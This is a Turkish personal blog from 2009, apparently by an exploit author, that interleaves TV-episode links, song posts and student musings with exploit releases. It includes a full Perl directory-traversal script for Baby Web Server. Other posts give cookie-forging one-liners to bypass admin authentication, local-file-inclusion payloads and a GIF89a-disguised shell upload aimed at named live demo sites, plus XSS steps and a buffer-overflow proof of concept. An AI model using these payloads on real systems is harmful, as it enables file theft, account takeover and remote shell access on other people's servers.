"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

30 Nisan 2009 Perşembe

Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploit

kaynak: http://www.milw0rm.com/exploits/8564

kaynak: http://www.yildirimordulari.com/showthread.php?t=6245



#!/usr/bin/perl -w
#
# Found By : ZoRLu
#
# Home: yildirimordulari.com , dafgamers.com , z0rlu.blogspot.com
#
# Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz. istemiyorsunuz isteseniz Sizlerde YaparsInýz
#
# Thanks: Str0ke, Cyber-Zone, Stack, AlpHaNiX, W0cker, Dr.Ly0n, ThE g0bL!N and all Friends
#
# Tested under my vista pc
#
# Download : http://www.mydesign.gen.tr/download/469.html
#
# Download : http://www.mydesign.gen.tr/yonlen/469.html
#
# Print: http://img186.imageshack.us/img186/8315/86639552.jpg

use LWP::Simple;
use LWP::UserAgent;

print "\n Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploit\n\n";

print "\*************************************************************************\n";
print "\* Exploited By : ZoRLu *\n";
print "\* msn : trt-turk[at]hotmail.com *\n";
print "\* Home : yildirimordulari.com , dafgamers.com *\n";
print "\* Not: Turkiye Cumhuriyeti *\n";
print "\*************************************************************************\n\n\n\n";

if(@ARGV < 3)
{
print "[-]Exp KullanIm HatasI\n";
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] KullanIm : perl $0 IP Port File\n";
print "[+] Ornek : perl $0 127.0.0.1 80 zorlu.ini\n";
}
($TargetIP, $Port, $File) = @ARGV;
print("Bekle Lutfen ! Server a BaglanIyor...... \n");
print("Please Wait ! Connet to Server ......\n\n\n");
sleep(5);

print(" Z Z\n");
print(" O O\n");
print(" R Wait... R\n");
print(" L L\n");
print(" U U\n\n\n");


$Not1="Gonlum Bir KitaptIr Bekler Masanda";
$Not2="Okusanda Olur, Okumasanda!!!";
$path="/../../../";
my $y0t = "http://" . $TargetIP . ":" . $Port . $path . $File;
print("islem BasladI.... |80\n\n");
print("Started....\n\n");
sleep(1);
print("1\n");
sleep(1);
print("2\n");
sleep(1);
print("3\n");
sleep(1);
print("4\n");
sleep(1);
print("5\n");
sleep(1);
print("6\n");
sleep(1);
print("7\n");
sleep(1);
print("8\n");
sleep(1);
print("9\n");
sleep(1);
print("10\n");
sleep(1);
print("11\n");
sleep(1);
print("12\n");
sleep(1);
print("13\n");
sleep(1);
print("14\n");
sleep(1);
print("15\n\n");
sleep(2);
print("islem TamamlandI !!! 5 sn sonra hersey hazIr\n\n");
print("it is done !!! you will wait 5 min\n\n");
print("\n\n");
print("1\n");
sleep(1);
print("2\n");
sleep(1);
print("3\n");
sleep(1);
print("4\n");
sleep(1);
print("5\n\n");
sleep(1);
print("TamamdIr!!!\n\n");
print("Done!!!\n\n");
sleep(2);
$ourfile=get $y0t;
if($ourfile){
print("\n\n\n............Our File...........\n\n");
print("$ourfile \n\n");
print(".........................EOF.......................\n\n");
print("islem Tamam\n\n");
print("Not:\n\n");
print("$Not1\n");
print("$Not2\n\n\n");
}
else
{
print(".........................EOF.......................\n\n");
print(" Dosya BulunamadI !!!\n\n");
print(" Not Found !!!\n\n");
exit;
}

S-Cms 1.1 Stable (page) Local File Inclusion Vulnerability

kaynak: http://www.milw0rm.com/exploits/8566

kaynak: http://www.yildirimordulari.com/showthread.php?t=6244



file:

s-cms/plugin.php

code:

$page=$_GET['page']; ( error 1 )


$sql_select_plugin_case= mysql_query("SELECT * FROM ".$prefix."_plugins WHERE active = '1' AND file='$page'");

if ($sql_select_plugin_case){

include "plugins/$page"; (error 2 )

exp:

yildirimordulari.com/s-cms/plugin.php?page=[File]

for demo:

http://www.nonsolomazzini.altervista.org/s-cms/plugin.php?page=[LFi]

24 Nisan 2009 Cuma

Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln

kaynak: http://www.milw0rm.com/exploits/8529

kaynak: http://www.yildirimordulari.com/showthread.php?t=6138



exploit:

javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";

after you go here:

http://www.xigla.com/absolutefp/demo/menu.asp

işte bir zone scripti daha

şimdi scripti beraber inceleyelim. scriptte ilk basta hersey normalmiş gibi görüniyo fakat biraz tarattığımızda rfi ve sql açıkları ile birde shell mevcut :) shell direk gözükmüyor hatta işini bilen kişiler tarafından hazırlandığıda belli oluyo tebrik etmekte lazım şimdi bakalım:

rfi:






sekilde de gördüğünüz gibi sadece bir rfi var oda system/sayfa.php de include edile dizin verisidir. oysa dizin verisi tanımlansa bu açık ortadan kalkacak bilerek tanımlanmamış ;) yada hiç buna bile gerek kalmadan ../alt.php şeklinde include edilse yine böyle bir sorun olmuycak yani sırf açık mevcut olsun script kullanıldıktan birkac gün sonra çakalım :D

gelelim başka bir açığa ama bu benimde hoşuma gitti beğendim. önce shell i css/spread klasörünün içine yerleştirmişler tabi bunu şifrelemişler yani bakınca direk shell olduğunu görmeniz mümkün değil hani sistem dosyasıymış gibi algılamanızı sağlıycak. benim hoşuma giden teknik ise kendi hazırladıkları index.html dosyasında bu dosyayı göstermemeleri. yani siz girdiğinizde bütün dosyaları görceksiniz yani adamlar herseyi tasarlamıslar. alın size sosyal :D ama ciddi manada ben beğendim tekniği ;) neyse bi kaç görüntü verdim inceleyin umarım demek istediğimi anlamıssınızdır. scriptleri lütfen körü körüne alıp site açmayın inceleyin ;)







Gülben Ergen & Oğuzhan Koç Düeti



dinleyin pişman olmazsınız ;)

İlgili aramalar: gülben - ergen - oğuzhan - koç - giden

23 Nisan 2009 Perşembe

Flat Calendar By-Pass / Html inj / XSS Multiple Vulns

kaynak: http://packetstormsecurity.org/0904-exploits/flatcal-bypassxss.txt

kaynak: http://www.yildirimordulari.com/showthread.php?t=6024

By-Pass

http://www.ossi-im-inter.net/calendar/admin/add.php


Html inj:

you go here:

http://www.ossi-im-inter.net/calendar/admin/add.php

write title after write your html code to description

example:

http://www.ossi-im-inter.net/calendar/viewEvent.php?eventNumber=561


Xss

you go here:

http://www.ossi-im-inter.net/calendar/admin/add.php

write title anything ( example salla :D )

write to description this code:

xss code ( site html çalıştırdığından yazmadım )

after go your calender

21 Nisan 2009 Salı

Kurtlar Vadisi 9 Bölüm Full İzle

ergunbey.com a teşekkürler

19 Nisan 2009 Pazar

Açık Yokmuş :S

mirror scriptlerine bi bakim dedim belki işimize yarar diyerekten bi baktım acıksız bi script işte delili yani onların dediğine göre açık yok :D



bi tarayım dedim neler yokki :D hani açık yoktu a.q en basidi rfi aha bakın sizde görün :D



yani işin özü siz milletin ne dediğini siktir edin eşeğinizi sağlam kazığa bağlayın tarayın mevcut scriptleri kullanmadan önce ;)

index yapma programı



basit bi program belki tam anlamıyla işinizi görmez ama yinede aniden index vs hazırlamanız gerekirse işinizi görebilir. kodladığınızı test etme ve kaydetme imkanınız var. basit bir pro. umarım yararı olur.

Down 1


Down 2


Down 3

17 Nisan 2009 Cuma

Online Password Manager 4.1 Insecure Cookie Handling Vulnerability

kaynak: http://www.milw0rm.com/exploits/8450

kaynak: http://www.yildirimordulari.com/showthread.php?t=5515



yildirimordulari.com/OPM/main.php

Exploit:

javascript:document.cookie = "auth=[nick]; path=/";


Exploit for demo:

http://www.esoftpro.com/demo/OPM/main.php

javascript:document.cookie = "auth=admin; path=/";

15 Nisan 2009 Çarşamba

Job2C 4.2 (adtype) Multiple Local File Inclusion Vulnerabilities

kaynak: http://www.milw0rm.com/exploits/8443

kaynak: http://www.yildirimordulari.com/showthread.php?t=5228



file:

windetail.php

err0r c0de:

$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"]; ( err0r c0de 1 )
$title=$_REQUEST["title"];

winHead($title);
include("lib/".$adtype.".inc"); ( err0r c0de 2 )

exp 1:

yildirimordulari.com/script/windetail.php?adtype=LFi

file:

detail.php

err0r c0de:

$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"]; ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";

include("lib/".$adtype.".inc"); ( err0r c0de 1 )


exp 2:

yildirimordulari.com/script/detail.php?adtype=LFi00

14 Nisan 2009 Salı

4 ün 2 sine gelince bırak :D

test edilmiş süper bir genellemeden biraz bahsedeyim aslında insan test etmeden pek inanmıyor ama hep şöyle olur: 1 in 1 i henüz tanışma faslıdır kimse kimseyi tanımaz hiç grup vs yoktur. sorun yoktur gayet güzel herşey. 1 in 2 si küçük kaynaşmalar olur ve küçük gruplar oluşur. hersey yine güzel. 2 nin 1 i ilk gruplar belli olmuştur artık bazı cizgiler çekilmiştir diğer üniversitelere geçişler yapılmıştır. bazı gruplar özel ev vs işlerine girmişlerdir. 2 nin 2 si gruplar yeniden şekillenir aslında bu son şekillenmedir genellikle artık bozulmuycak gruplaşmalar oluşur sınıfın komiği, sınıfın gerzeği, sınıfın dandiği, sınıfın motoru, fakültenin motoru, su moturu vs hersey bellidir artık. kimin kimi sevdiği kimin kimden nefret ettiği herkes tarafından bilinir. 3 ün 1 inde herkeste tam bi rahatlama söz konusudur belkide en parlak dönemdir dostlukar açısından ye iç yan gel yat. ama sınavlar açısından da tam bi hüsran söz konusudur. genelde en zor dönem 3 ün 1 i ve 3 ün 2 sidir ama dostluklar süperdir. asarım keserim dostun dostumdur dostumun dostu dostumdur düşmanın kaşarlı tostumdur gibisinden artık su sızmıyordur gruplar arasında. 3 ün 2 si bu dönemde artık seneye kpss zımbırtısının şeysi olaraktan fakültede bulunacağınızdan dersler konusunda daha bi titiz olursunuz alta ders düşmesin kaygısı yada üsten ders alsam da 4 ün 2 sinde rahat çalışsam telaşı vs ama yinede hersey güzeldir ye iç yan gel yat. okey, batak, pişpirik, poker, joker, ekşın, karı kız davası vs 3 ün 2 side gelip geçer. 4 ün 1 inde yeniden kopmalar olur mevcut gruplardan sıkılanlar olabilir yada gruba ekşın gelsin diye ota boka bireyler arasında tartışmalar olur eskisi gibi değildir hiç birşey. 4 ün 1 inin sonlarına yakın, kpss zırbırtısı dostlukları unutturur herkese. artık okey, pişpirik, karıkız ayağı bitimiştir. dostlukların bir ayağı çukurdadır. çok nadir gruplar toplanır bazı aktiviteler yapar. gelelim 4 ün 2 sine aklınız varsa fakülteyi bırakın siktir edin gitsin. hiç bi boka yaramaz 4 ün 2 si. tavsiyem 4 ün 1 inde bırakmanızdan yanadır ama bi hatadır 4 ün 2 sine geldiniz diyelim kesinlikle bırakın :D tecrübe pöykürüyor dinleyin bu kardeşinizi :P

11 Nisan 2009 Cumartesi

FunkyASP AD System 1.1 Remote Shell Upload Vulnerability

kaynak: http://www.milw0rm.com/exploits/8397

kaynak: http://www.yildirimordulari.com/showthread.php?t=3955



first register to site

you add this code your shell to head

GIF89a;

example your_shell.asp:

GIF89a;

...

...

...

?>

and save your_sheell.asp

you go to here:

http://yildirimordulari.com/demo/banner/admin.asp?action=upload

and your shell here:

http://yildirimordulari.com/demo/banner/banners/z.asp

for demo:

http://demo.funkyasp.com/demo/banner/admin.asp?action=upload

shell:

http://demo.funkyasp.com/demo/banner/banners/z.asp

10 Nisan 2009 Cuma

intellitamper v2.07 (.txt file ) Local buffer overflow POC

kaynak: http://packetstormsecurity.org/0904-exploits/intellitamper207-overflow.txt

Kaynak: http://www.yildirimordulari.com/showthread.php?t=3913



# Author: ZoRLu
# Home: yildirimordulari.com & z0rlu.blogspot.com & dafgamers.com
# Msn: trt-turk@hotmail.com
# Not: herkes hecker olmus :S
# intellitamper v2.07 (.txt file ) Local buffer overflow POC
# EAX 7EFEFEFE
# ECX 3F82EA97
# EDX 41414141
# EBX FE0C702F
# ESP 001235C8
# ESI 01F455A4
# EDI 00130000 ASCII "Actx "
# EIP 00416369 intellit.00416369

# EDX 41414141 for char 50644
# --------------------------------------------------------
#!/usr/bin/perl
#[*] intellitamper v2.07 (.txt file ) Local buffer overflow POC
use warnings;
use strict;
my $chars = "\x41" x 50644 ;
my $file="z0rlu.txt";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file Dosya Hazir. \n";
# ----------------------------------------------------------

İşte Bir The_Omar Klasiği


Bu adam bu işi biliyor arkadaş. karakalemde üstüne yoktur(!) bakmayın yaşının yirmi küsür olduğuna içinde kıpır kıpır on tane velet taşıyor sanki :D yaptığı karakalemde dolayısıyla bu zeka yaşına uygun :D görünce bloğum bu şaheserden mahrum kalmasın istedim hemen yayınladım eminim sizlerde çok beğeneceksiniz :D The_Omar a selam :D

Polat Milli Oldu :D

son bölümde polat abimizin(!) hücreden çıktıktan sonraki ilk işi sevgilisinin yanına koşarak kapıları yüzümüze kapamak oldu xD polat alemdar da artık milli takımda top koşturuyor xD hadi hayırlısı

9 Nisan 2009 Perşembe

Kurtlar Vadisi Pusu 54. Bölüm Fragmanı

7 Nisan 2009 Salı

Kurtlar Vadisi 8 Bölüm Full İzle

ergunbey.com a teşekkürler

Kurtlar Vadisi 7. Bölüm Full İzle

Numan Hadi - İnsafsız Sevgilim

damar bi parça ısrar ilen dinlemenizi tavsiye ediyorum : )

git artık perişanım ben

yeter çektiğim elinden

al bu canı çek bedenden

öldüm bittim ben derdinden

Download 1:

http://www.upload.gen.tr/d.php/s5/u9ylne0x/insafsiz_sevgilim.rar.html

Download 2:

http://www.dosyasitesi.com/download.php?file=832insafsiz%20sevgilim.rar

4 Nisan 2009 Cumartesi

Pageranklar Uçtu :D



geçen gün google a seslenmiştim pageranklar noldu goçum ilgilen şunlarla oda kırmamış beni sağolsun ilgilenmiş :P hem yildirimordulari.com un hemde z0rlu.blogspot.com un pagerank ı 3 olmuş teşekkürler google alemdar :P

dafgamers.com

w0cker kankam müthiş bir oyun sitesi açmış ben girdim üye oldum gayet güzel olmuş hepinizi beklerik :D
 
Dizi